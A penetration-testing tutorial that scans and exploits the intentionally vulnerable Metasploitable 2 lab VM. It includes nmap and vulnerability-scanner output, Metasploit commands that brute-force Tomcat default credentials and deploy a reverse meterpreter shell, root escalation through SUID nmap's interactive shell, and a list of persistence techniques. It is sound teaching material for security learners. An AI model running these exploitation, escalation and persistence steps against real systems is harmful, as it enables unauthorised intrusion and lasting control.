In this tutorial we’re going to identify running services on the target server and try to exploit them.
Tools
We will use the following tools:
- 1. https://nmap.org/
- 2. https://www.openvas.org/
- 3. https://www.tenable.com/products/nessus
- 4. https://www.metasploit.com/
Metasploitable 2
You should download a vulnerable machine from https://sourceforge.net/projects/metasploitable/ . Then you should import it into any VM software, I’ll be using VirtualBox. In the VM settings set network adapter to Bridged Adapter and start the machine. Run ifconfig to get the ip address of your vulnerable machine, in my case it is 192.168.0.106.
Identifying live hosts
Typically you are given a set of ip addresses and the 1st step is to identify which hosts are live. We are using a single machine so we only have a single ip address.
Run nmap -sn 192.168.0.106:
|
1 2 3 4 |
Starting Nmap 7.60 ( https://nmap.org ) at 2021-09-10 10:31 MSK Nmap scan report for 192.168.0.106 Host is up (0.00026s latency). Nmap done: 1 IP address (1 host up) scanned in 0.00 seconds |
We can see that our target machine is live. When you have a bunch of ip addresses you can scan using a mask, ex: nmap -sn 192.168.0.106/24
Identifying open ports
Now we should identify open ports and services on those ports.
Run nmap -sS -sV --script=default --top-ports 1000 --version-all -O --osscan-guess -T4 --open -Pn -v 192.168.0.106 for TCP scan:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 |
Starting Nmap 7.60 ( https://nmap.org ) at 2021-09-10 10:40 MSK NSE: Loaded 146 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 10:40 Completed NSE at 10:40, 0.00s elapsed Initiating NSE at 10:40 Completed NSE at 10:40, 0.00s elapsed Initiating ARP Ping Scan at 10:40 Scanning 192.168.0.106 [1 port] Completed ARP Ping Scan at 10:40, 0.22s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 10:40 Completed Parallel DNS resolution of 1 host. at 10:40, 0.00s elapsed Initiating SYN Stealth Scan at 10:40 Scanning 192.168.0.106 [1000 ports] Discovered open port 111/tcp on 192.168.0.106 Discovered open port 3306/tcp on 192.168.0.106 Discovered open port 23/tcp on 192.168.0.106 Discovered open port 5900/tcp on 192.168.0.106 Discovered open port 21/tcp on 192.168.0.106 Discovered open port 445/tcp on 192.168.0.106 Discovered open port 53/tcp on 192.168.0.106 Discovered open port 25/tcp on 192.168.0.106 Discovered open port 22/tcp on 192.168.0.106 Discovered open port 80/tcp on 192.168.0.106 Discovered open port 139/tcp on 192.168.0.106 Discovered open port 1524/tcp on 192.168.0.106 Discovered open port 514/tcp on 192.168.0.106 Discovered open port 2121/tcp on 192.168.0.106 Discovered open port 512/tcp on 192.168.0.106 Discovered open port 6667/tcp on 192.168.0.106 Discovered open port 6000/tcp on 192.168.0.106 Discovered open port 5432/tcp on 192.168.0.106 Discovered open port 8009/tcp on 192.168.0.106 Discovered open port 1099/tcp on 192.168.0.106 Discovered open port 8180/tcp on 192.168.0.106 Discovered open port 2049/tcp on 192.168.0.106 Discovered open port 513/tcp on 192.168.0.106 Completed SYN Stealth Scan at 10:40, 1.27s elapsed (1000 total ports) Initiating Service scan at 10:40 Scanning 23 services on 192.168.0.106 Completed Service scan at 10:40, 11.10s elapsed (23 services on 1 host) Initiating OS detection (try #1) against 192.168.0.106 NSE: Script scanning 192.168.0.106. Initiating NSE at 10:40 NSE: [ftp-bounce] PORT response: 500 Illegal PORT command. Completed NSE at 10:41, 8.89s elapsed Initiating NSE at 10:41 Completed NSE at 10:41, 0.01s elapsed Nmap scan report for 192.168.0.106 Host is up (0.0044s latency). Not shown: 977 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: | STAT: | FTP server status: | Connected to 192.168.0.105 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | vsFTPd 2.3.4 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) | ssh-hostkey: | 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA) |_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA) 23/tcp open telnet Linux telnetd 25/tcp open smtp Postfix smtpd |_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, | ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX | Issuer: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX | Public Key type: rsa | Public Key bits: 1024 | Signature Algorithm: sha1WithRSAEncryption | Not valid before: 2010-03-17T14:07:45 | Not valid after: 2010-04-16T14:07:45 | MD5: dcd9 ad90 6c8f 2f73 74af 383b 2540 8828 |_SHA-1: ed09 3088 7066 03bf d5dc 2373 99b4 98da 2d4d 31c6 |_ssl-date: 2021-09-10T07:40:56+00:00; +2s from scanner time. | sslv2: | SSLv2 supported | ciphers: | SSL2_RC2_128_CBC_WITH_MD5 | SSL2_RC2_128_CBC_EXPORT40_WITH_MD5 | SSL2_DES_192_EDE3_CBC_WITH_MD5 | SSL2_RC4_128_EXPORT40_WITH_MD5 | SSL2_RC4_128_WITH_MD5 |_ SSL2_DES_64_CBC_WITH_MD5 53/tcp open domain ISC BIND 9.4.2 | dns-nsid: |_ bind.version: 9.4.2 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2 |_http-title: Metasploitable2 - Linux 111/tcp open rpcbind 2 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2 111/tcp rpcbind | 100000 2 111/udp rpcbind | 100003 2,3,4 2049/tcp nfs | 100003 2,3,4 2049/udp nfs | 100005 1,2,3 35945/udp mountd | 100005 1,2,3 41405/tcp mountd | 100021 1,3,4 34319/tcp nlockmgr | 100021 1,3,4 49999/udp nlockmgr | 100024 1 40260/tcp status |_ 100024 1 42186/udp status 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP) 512/tcp open exec netkit-rsh rexecd 513/tcp open login OpenBSD or Solaris rlogind 514/tcp open tcpwrapped 1099/tcp open java-rmi Java RMI Registry 1524/tcp open shell Metasploitable root shell 2049/tcp open nfs 2-4 (RPC #100003) 2121/tcp open ftp ProFTPD 1.3.1 3306/tcp open mysql MySQL 5.0.51a-3ubuntu5 | mysql-info: | Protocol: 10 | Version: 5.0.51a-3ubuntu5 | Thread ID: 24 | Capabilities flags: 43564 | Some Capabilities: Speaks41ProtocolNew, Support41Auth, SupportsTransactions, ConnectWithDatabase, SwitchToSSLAfterHandshake, LongColumnFlag, SupportsCompression | Status: Autocommit |_ Salt: &EjfARW>p=zsQy/|E$}p 5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7 | ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX | Issuer: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX | Public Key type: rsa | Public Key bits: 1024 | Signature Algorithm: sha1WithRSAEncryption | Not valid before: 2010-03-17T14:07:45 | Not valid after: 2010-04-16T14:07:45 | MD5: dcd9 ad90 6c8f 2f73 74af 383b 2540 8828 |_SHA-1: ed09 3088 7066 03bf d5dc 2373 99b4 98da 2d4d 31c6 |_ssl-date: 2021-09-10T07:40:56+00:00; +1s from scanner time. 5900/tcp open vnc VNC (protocol 3.3) | vnc-info: | Protocol version: 3.3 | Security types: |_ VNC Authentication (2) 6000/tcp open X11 (access denied) 6667/tcp open irc UnrealIRCd | irc-info: | users: 1 | servers: 1 | lusers: 1 | lservers: 0 | server: irc.Metasploitable.LAN | version: Unreal3.2.8.1. irc.Metasploitable.LAN | uptime: 0 days, 0:38:06 | source ident: nmap | source host: A74A61A3.F0D9233E.FFFA6D49.IP |_ error: Closing Link: apantuudi[192.168.0.105] (Quit: apantuudi) 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) |_ajp-methods: Failed to get a valid response for the OPTION request 8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1 |_http-favicon: Apache Tomcat | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache-Coyote/1.1 |_http-title: Apache Tomcat/5.5 MAC Address: 08:00:27:4F:B5:C2 (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.9 - 2.6.33 Uptime guess: 0.023 days (since Fri Sep 10 10:07:28 2021) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=199 (Good luck!) IP ID Sequence Generation: All zeros Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 1s, deviation: 0s, median: 0s | nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | Names: | METASPLOITABLE<00> Flags: <unique><active> | METASPLOITABLE<03> Flags: <unique><active> | METASPLOITABLE<20> Flags: <unique><active> | WORKGROUP<00> Flags: <group><active> |_ WORKGROUP<1e> Flags: <group><active> | smb-os-discovery: | OS: Unix (Samba 3.0.20-Debian) | NetBIOS computer name: | Workgroup: WORKGROUP\x00 |_ System time: 2021-09-10T03:40:55-04:00 |_smb2-time: Protocol negotiation failed (SMB2) NSE: Script Post-scanning. Initiating NSE at 10:41 Completed NSE at 10:41, 0.00s elapsed Initiating NSE at 10:41 Completed NSE at 10:41, 0.00s elapsed Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 24.00 seconds Raw packets sent: 1041 (48.284KB) | Rcvd: 1036 (44.012KB) |
Run nmap -sU --top-ports 100 -Pn -v 192.168.0.106 for UDP scan:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 |
Starting Nmap 7.60 ( https://nmap.org ) at 2021-09-10 10:58 MSK Initiating ARP Ping Scan at 10:58 Scanning 192.168.0.106 [1 port] Completed ARP Ping Scan at 10:58, 0.23s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 10:58 Completed Parallel DNS resolution of 1 host. at 10:58, 0.00s elapsed Initiating UDP Scan at 10:58 Scanning 192.168.0.106 [100 ports] Discovered open port 111/udp on 192.168.0.106 Discovered open port 53/udp on 192.168.0.106 Increasing send delay for 192.168.0.106 from 0 to 50 due to max_successful_tryno increase to 4 Increasing send delay for 192.168.0.106 from 50 to 100 due to max_successful_tryno increase to 5 Increasing send delay for 192.168.0.106 from 100 to 200 due to max_successful_tryno increase to 6 Increasing send delay for 192.168.0.106 from 200 to 400 due to max_successful_tryno increase to 7 Increasing send delay for 192.168.0.106 from 400 to 800 due to 11 out of 12 dropped probes since last increase. UDP Scan Timing: About 46.44% done; ETC: 10:59 (0:00:36 remaining) Discovered open port 137/udp on 192.168.0.106 Discovered open port 2049/udp on 192.168.0.106 Completed UDP Scan at 10:59, 104.95s elapsed (100 total ports) Nmap scan report for 192.168.0.106 Host is up (0.00056s latency). Not shown: 93 closed ports PORT STATE SERVICE 53/udp open domain 68/udp open|filtered dhcpc 69/udp open|filtered tftp 111/udp open rpcbind 137/udp open netbios-ns 138/udp open|filtered netbios-dgm 2049/udp open nfs MAC Address: 08:00:27:4F:B5:C2 (Oracle VirtualBox virtual NIC) Read data files from: /usr/bin/../share/nmap Nmap done: 1 IP address (1 host up) scanned in 105.38 seconds Raw packets sent: 225 (8.432KB) | Rcvd: 103 (7.507KB) |
Now we have extensive information about opened ports, services and OS.
Vulnerability assessment
Now we’re going to use different tools in order to automate vulnerability search.
Nmap
Nmap has a bunch of scripts for vulnerability assessment.
Vulscan
Copy vulscan repository https://github.com/scipag/vulscan to your nmap script’s folder at /usr/share/nmap/scripts. Run nmap -sV --script=vulscan/vulscan.nse 192.168.0.106. You will get a list of ports with related CVEs:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 |
Starting Nmap 7.60 ( https://nmap.org ) at 2021-09-10 11:30 MSK Nmap scan report for 192.168.0.106 Host is up (0.0098s latency). Not shown: 977 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 | vulscan: VulDB - https://vuldb.com: | [146452] vsftpd 2.3.4 Service Port 6200 privilege escalation | | MITRE CVE - https://cve.mitre.org: | [CVE-2011-0762] The vsf_filename_passes_filter function in ls.c in vsftpd before 2.3.3 allows remote authenticated users to cause a denial of service (CPU consumption and process slot exhaustion) via crafted glob expressions in STAT commands in multiple FTP sessions, a different vulnerability than CVE-2010-2632. | | SecurityFocus - https://www.securityfocus.com/bid/: | [82285] Vsftpd CVE-2004-0042 Remote Security Vulnerability | [72451] vsftpd CVE-2015-1419 Security Bypass Vulnerability | [51013] vsftpd '__tzfile_read()' Function Heap Based Buffer Overflow Vulnerability | [48539] vsftpd Compromised Source Packages Backdoor Vulnerability | [46617] vsftpd FTP Server 'ls.c' Remote Denial of Service Vulnerability | [41443] Vsftpd Webmin Module Multiple Unspecified Vulnerabilities | [30364] vsftpd FTP Server Pluggable Authentication Module (PAM) Remote Denial of Service Vulnerability | [29322] vsftpd FTP Server 'deny_file' Option Remote Denial of Service Vulnerability | [10394] Vsftpd Listener Denial of Service Vulnerability | [7253] Red Hat Linux 9 vsftpd Compiling Error Weakness | | IBM X-Force - https://exchange.xforce.ibmcloud.com: | [68366] vsftpd package backdoor | [65873] vsftpd vsf_filename_passes_filter denial of service | [55148] VSFTPD-WEBMIN-MODULE unknown unspecified | [43685] vsftpd authentication attempts denial of service | [42593] vsftpd deny_file denial of service | [16222] vsftpd connection denial of service | [14844] vsftpd message allows attacker to obtain username | [11729] Red Hat Linux vsftpd FTP daemon tcp_wrapper could allow an attacker to gain access to server | | Exploit-DB - https://www.exploit-db.com: | [17491] VSFTPD 2.3.4 - Backdoor Command Execution |
Nmap-vulners
Copy nmap-vulners repository https://github.com/vulnersCom/nmap-vulners to your nmap script’s folder at /usr/share/nmap/scripts. Run nmap -sV --script=nmap-vulners/vulners.nse 192.168.0.106. You will again get a list of ports with CVEs:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 |
Starting Nmap 7.60 ( https://nmap.org ) at 2021-09-10 11:31 MSK Nmap scan report for 192.168.1.106 Host is up (0.34s latency). Not shown: 55 closed ports PORT STATE 21/tcp open ftp ProFTPD 1.3.3e 22/tcp open ssh OpenSSH 5.3p1 Debian 3 ubuntu7.1 (Ubuntu Linux; protocol 2.0) | vulners: | cpe:/a:openbsd:openssh:5.3p1: | CVE-2016-10708 5.0 https://vulners.com/cve/CVE-2016-10708 8 | CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906 | CVE-2018-15473 5.0 https://vulners.com/cve/CVE-2018-15473 |_ CVE-2016-0777 4.0 https://vulners.com/cve/CVE-2016-0777 25/tcp open smtp Postfix smtpd 53/tcp open domain ISC BIND DNS | vulners: | ISC BIND DNS: | CVE-2012-1667 8.5 https://vulners.com/cve/CVE-2012-1667 | CVE-2002-0651 7.5 https://vulners.com/cve/CVE-2002-0651 | CVE-2002-0029 7.5 https://vulners.com/cve/CVE-2002-0029 80/tcp open http nginx 1.4.1 |_http-server-header: nginx/1.4.1 |
Vuln
Nmap has a default vuln script. Run nmap --script=vuln -sV 192.168.0.106 -p 8180 to scan a specific port:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 |
Starting Nmap 7.60 ( https://nmap.org ) at 2021-09-10 11:50 MSK Pre-scan script results: | broadcast-avahi-dos: | Discovered hosts: | 224.0.0.251 | After NULL UDP avahi packet DoS (CVE-2011-1002). |_ Hosts are all up (not vulnerable). Nmap scan report for 192.168.0.106 Host is up (0.00027s latency). PORT STATE SERVICE VERSION 8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1 | http-cookie-flags: | /admin/: | JSESSIONID: | httponly flag not set | /admin/index.html: | JSESSIONID: | httponly flag not set | /admin/login.html: | JSESSIONID: | httponly flag not set | /admin/admin.html: | JSESSIONID: | httponly flag not set | /admin/account.html: | JSESSIONID: | httponly flag not set | /admin/admin_login.html: | JSESSIONID: | httponly flag not set | /admin/home.html: | JSESSIONID: | httponly flag not set | http-csrf: | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.0.106 | Found the following possible CSRF vulnerabilities: | | Path: http://192.168.0.106:8180/admin/ | Form id: username | Form action: j_security_check;jsessionid=C9A7258647435573472A9E2B568ACF98 | | Path: http://192.168.0.106:8180/servlets-examples/servlet/CookieExample | Form id: | Form action: CookieExample | | Path: http://192.168.0.106:8180/servlets-examples/servlet/SessionExample | Form id: | Form action: SessionExample;jsessionid=836EEFE0954B6376032984BFD3751EAA | | Path: http://192.168.0.106:8180/servlets-examples/servlet/SessionExample | Form id: | Form action: SessionExample;jsessionid=836EEFE0954B6376032984BFD3751EAA | | Path: http://192.168.0.106:8180/servlets-examples/servlet/RequestParamExample | Form id: |_ Form action: RequestParamExample |_http-dombased-xss: Couldn't find any DOM based XSS. | http-enum: | /admin/: Possible admin folder | /admin/index.html: Possible admin folder | /admin/login.html: Possible admin folder | /admin/admin.html: Possible admin folder | /admin/account.html: Possible admin folder | /admin/admin_login.html: Possible admin folder | /admin/home.html: Possible admin folder | /admin/admin-login.html: Possible admin folder | /admin/adminLogin.html: Possible admin folder | /admin/controlpanel.html: Possible admin folder | /admin/cp.html: Possible admin folder | /admin/index.jsp: Possible admin folder | /admin/login.jsp: Possible admin folder | /admin/admin.jsp: Possible admin folder | /admin/home.jsp: Possible admin folder | /admin/controlpanel.jsp: Possible admin folder | /admin/admin-login.jsp: Possible admin folder | /admin/cp.jsp: Possible admin folder | /admin/account.jsp: Possible admin folder | /admin/admin_login.jsp: Possible admin folder | /admin/adminLogin.jsp: Possible admin folder | /manager/html/upload: Apache Tomcat (401 Unauthorized) | /manager/html: Apache Tomcat (401 Unauthorized) | /admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html: OpenCart/FCKeditor File upload | /admin/includes/FCKeditor/editor/filemanager/upload/test.html: ASP Simple Blog / FCKeditor File Upload | /admin/jscript/upload.html: Lizard Cart/Remote File upload |_ /webdav/: Potentially interesting folder |_http-server-header: Apache-Coyote/1.1 |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. MAC Address: 08:00:27:4F:B5:C2 (Oracle VirtualBox virtual NIC) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 76.93 seconds |
OpenVAS
Run openvas from docker image at https://github.com/immauss/openvas. Login into your openvas account on your localhost, create a new task for target Metasploitable virtual machine and run the task. You should see the following report after scan is finished:
Nessus
Nessus is a paid vulnerability scanner but it allows up to 16 hosts used for free. Open nessus on your localhost, login, set up a new Basic Network Scan and run the scan. After the scan is finished you should see the following report:
Port by port
At this stage we have all the information about services, ports, possible CVEs and possible vectors. Now, we should go port by port and try to perform the following tasks:
- 1. Exploit vulnerability on port (if it exists)
- 2. Privilege escalation
- 3. Persistence
Exploiting
Take a look at the port 8180 where we can see the Apache Tomcat server. Click on the Status link and Apache will ask for user and password. We can try to bruteforce the credentials using Metasploit. Open msfconsole, then run:
|
1 2 3 4 |
msf6 > use auxiliary/scanner/http/tomcat_mgr_login msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RHOSTS 192.168.0.106 msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RPORT 8180 msf6 auxiliary(scanner/http/tomcat_mgr_login) > run |
You can see the following output:
|
1 2 3 4 5 |
[+] 192.168.0.106:8180 - Login Successful: tomcat:tomcat [-] 192.168.0.106:8180 - LOGIN FAILED: both:admin (Incorrect) [-] 192.168.0.106:8180 - LOGIN FAILED: both:manager (Incorrect) [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed |
Default login and password tomcat seem to be working.
Now click Status => enter tomcat for login and password => List Applications. You can see the Upload button where we can upload a shell. Run:
|
1 2 3 4 5 6 |
msf6 > use exploit/multi/http/tomcat_mgr_deploy msf6 exploit(multi/http/tomcat_mgr_deploy) > set HttpPassword tomcat msf6 exploit(multi/http/tomcat_mgr_deploy) > set HttpUsername tomcat msf6 exploit(multi/http/tomcat_mgr_deploy) > set RHOSTS 192.168.0.106 msf6 exploit(multi/http/tomcat_mgr_deploy) > set RPORT 8180 msf6 exploit(multi/http/tomcat_mgr_deploy) > run |
You will get a meterpreter session:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
[*] Started reverse TCP handler on 192.168.0.105:4444 [*] Attempting to automatically select a target... [*] Automatically selected target "Linux x86" [*] Uploading 6216 bytes as Sygg5.war ... [*] Executing /Sygg5/mDnNj.jsp... [*] Undeploying Sygg5 ... [*] Sending stage (58082 bytes) to 192.168.0.106 [*] Meterpreter session 1 opened (192.168.0.105:4444 -> 192.168.0.106:36611) at 2021-09-10 17:12:03 +0300 meterpreter > sysinfo Computer : metasploitable OS : Linux 2.6.24-16-server (i386) Meterpreter : java/linux meterpreter > getuid Server username: tomcat55 |
Privilege escalation
To get root access we can search for SUID set binaries. Run:
|
1 2 |
meterpreter > shell find / -perm -u=s -type f 2>/dev/null |
You will see the following binaries:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 |
/bin/umount /bin/fusermount /bin/su /bin/mount /bin/ping /bin/ping6 /sbin/mount.nfs /lib/dhcp3-client/call-dhclient-script /usr/bin/sudoedit /usr/bin/X /usr/bin/netkit-rsh /usr/bin/gpasswd /usr/bin/traceroute6.iputils /usr/bin/sudo /usr/bin/netkit-rlogin /usr/bin/arping /usr/bin/at /usr/bin/newgrp /usr/bin/chfn /usr/bin/nmap /usr/bin/chsh /usr/bin/netkit-rcp /usr/bin/passwd /usr/bin/mtr /usr/sbin/uuidd /usr/sbin/pppd /usr/lib/telnetlogin /usr/lib/apache2/suexec /usr/lib/eject/dmcrypt-get-device /usr/lib/openssh/ssh-keysign /usr/lib/pt_chown |
Run:
|
1 2 3 |
nmap --interactive nmap> !sh whoami |
You should see the root keyword.
Persistence
There are a few ways to maintain persistence:
- 1. Add SSH key
- 2. Server shell (php, etc…)
- 3. CRON job
- 4. User’s .bashrc file
- 5. Services
- 6. sudoers
- 7. SUID files
Report
When all ports are scanned then it is time to write a report. You can find an example report here https://tcm-sec.com/wp-content/uploads/2021/04/TCMS-Demo-Corp-Security-Assessment-Findings-Report.pdf